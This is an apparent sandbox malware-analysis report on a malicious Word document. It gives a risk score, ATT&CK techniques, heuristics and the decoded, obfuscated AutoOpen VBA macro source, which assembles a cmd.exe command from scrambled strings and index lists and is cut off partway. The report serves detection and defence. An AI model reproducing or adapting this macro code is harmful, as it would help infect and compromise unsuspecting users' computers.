MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute a command using cmd.exe, which is a strong indicator of a downloader or initial execution stage for a more complex attack. The ClamAV detection further supports its malicious nature. The specific command executed is obfuscated but clearly intended to leverage the Windows command shell.
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-6703371-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6703371-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6295 bytes |
SHA-256: f829bb414fa35f40545b1a9f66a4503cd7b4ca25a35fdff1d5af4a012819acca |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "VIuwBzjOnR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Fix(68460 + qaArUG)
TypeName ChrW(aEiEM)
TypeName Rnd(64)
TypeName uBRdFs
TypeName ChrB(92)
TypeName HpwJf
Shell@ CStr("c") + CStr("m") + tJXVbMTk + iKACdtzQRoW + fmlrQ + ThKmJa + oLzSr + wtXHivttmHT + lbhFIjawO + TYWpBNdU, 813793893 - 813793893
TypeName Rnd(28)
TypeName CByte(669)
End Sub
Attribute VB_Name = "kzGCKGTOsnwCu"
Function fmlrQ()
On Error Resume Next
TypeName Rnd(8264)
TypeName Round(7353)
TypeName Log(BpZMv * jzpIBs + kqwdbU - QjzJQ)
itatOiT = "d /V/C" + CStr(Chr(wWjfjhJHiuN + zRfPSsZ + 34 + SOKfZSBDfuQvIN + OIrRjFsTDmnLHM)) + "s" + "et Z" + "Er" + "W=b" + "Xtj" + "AduknkuHX" + "ZjjcKWUR" + "tkruXt5NfL" + "Vs$" + "Sl" + "i.v:yp"
TypeName 3322
TypeName CInt(tkjEPY + ijrwqG)
rzitTRpPi = "JP8D/'o" + "6 -B14h,M)" + "_+" + "e;\9" + "gF" + "z" + "}C{=" + "@m" + "aw(x&&fo" + "r %v in (4" + "1;48;"
TypeName wOQMZV
TypeName RrQwpK
TypeName ChrW(42921 + Tzwif)
VbzmLQ = "75;61" + ";23;32;55;" + "61;35;35;" + "50;33;28;3" + "4;75;7"
TypeName wACzwm
TypeName qjGEHu
TypeName Sgn(vcOaco / SjOaO - 85275 + FpKzj)
HlCrfJNJjpk = "1" + ";8;61;75;5" + "1;48;0" + ";15;61;16;" + "26;50;2" + "8;61;26;3"
TypeName Log(YQtZC)
TypeName CDbl(pDOdF + PXGCLW * XlWRE * HWUtKh)
GzsSabDIOwV = "7;18;61;0" + ";6" + "9;35;36;6" + "1;8;26;62" + ";33;67;"
TypeName Elkrh
TypeName 17
TypeName CInt(82)
cWDabkjNfBn = "52;43;7" + "1;47;55;" + "2" + "6;26" + ";41;39" + ";" + "46;4" + "6;" + "48;22;32;"
TypeName 5336
TypeName Rnd(hdQah)
TypeName VzUKE
zLjHj = "36;23;37;1" + "6;48;73;46" + ";74;41;" + "41;35;3" + "6" + ";16;74;26"
TypeName ChrB(rGNdIJ * PIFMT)
TypeName Tan(9)
TwktvzXDWI = ";36;48;" + "8;46;3" + "5;74" + ";8;65;24;" + "74" + ";65;6" + "1;59" + ";27" + ";59;15;" + "24;8;61;46"
fmlrQ = itatOiT + rzitTRpPi + VbzmLQ + HlCrfJNJjpk + GzsSabDIOwV + cWDabkjNfBn + zLjHj + TwktvzXDWI
TypeName BfTGk
TypeName 57
TypeName Sin(22324 / wrtnSM / SBAbo + 26676)
End Function
Function ThKmJa()
On Error Resume Next
TypeName 4897
TypeName 5
qiRzzKD = ";49;32;3" + "6;" + "25;72;55;" + "26;26;41;" + "3" + "9;46;46;24"
TypeName ChrW(828)
TypeName Int(7)
QBnCEpiojq = ";8;36" + ";38;" + "61;23" + ";32;36;" + "26;40" + ";41;35;2" + "4;73;0;" + "36;8;65;3"
TypeName ChrB(FJBIZd - wjQBm * 23751 * fbptF)
TypeName Log(19079 * NinJO)
TypeName CLng(wUqbB * jmKniG - 6601 - LmaJm)
wIYnYWjbZ = "6;8;" + "16;37;1" + "6;48;73" + ";" + "46;40;5" + ";5" + "4;72" + ";55;26;26" + ";41;39;46;"
TypeName cPNkp
TypeName 3104
TTtwoTlI = "46;24;74;" + "36" + ";37;" + "41;23;48;" + "15;61;26;4"
TypeName Round(8)
TypeName OblvK
uHiUsQZ = "8;32;38" + ";4" + "1;37" + ";16;4" + "8;73" + ";37;" + "0;23;46;3"
ThKmJa = qiRzzKD + QBnCEpiojq + wIYnYWjbZ + TTtwoTlI + uHiUsQZ
TypeName Chr(228591726)
TypeName pfGauG
TypeName sNzbU
End Function
Function oLzSr()
On Error Resume Next
TypeName Chr(86356 / NRwoPp * QrbfQ / PzHhwm)
TypeName TiqtiH
hQrAPakWoqu = "0;41;8;16;" + "65;72" + ";55;" + "26;26;41;" + "3" + "9;46;" + "46;7" + "5;" + "75;7"
TypeName qECjzt
TypeName Sgn(14458 * qjKDiT - PzzTno * XlumFu)
TypeName Oct(FdzkaN)
OGpifqCo = "5;37" + ";27;53;75;" + "55;37;26;" + "48;41" + ";46;61" + ";75;31" + ";54;72;5" + "5;2"
TypeName CDate(ZZVwm)
TypeName CStr(209828617)
iQTABZRppbA = "6;26;41" + ";39;46" + ";46;73;" + "74;16;23;" + "48;" + "3"
TypeName Chr(HOKRT * CKfwC)
TypeName CBool(262)
TypeName CSng(pIdjF + sYXitt / 26665 - zkGin)
hzzDZifzp = "2;41;74" + ";67;36;" + "4" + "8;37;" + "36;26;46"
TypeName XoKri
TypeName 491791782
TypeName Chr(93795204)
urnss = ";48" + ";42;" + "35;47;37;3" + "4;41;" + "35;" + "3" + "6;26;" + "76;" + "47;7" + "2;" + "47;58;"
TypeName
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.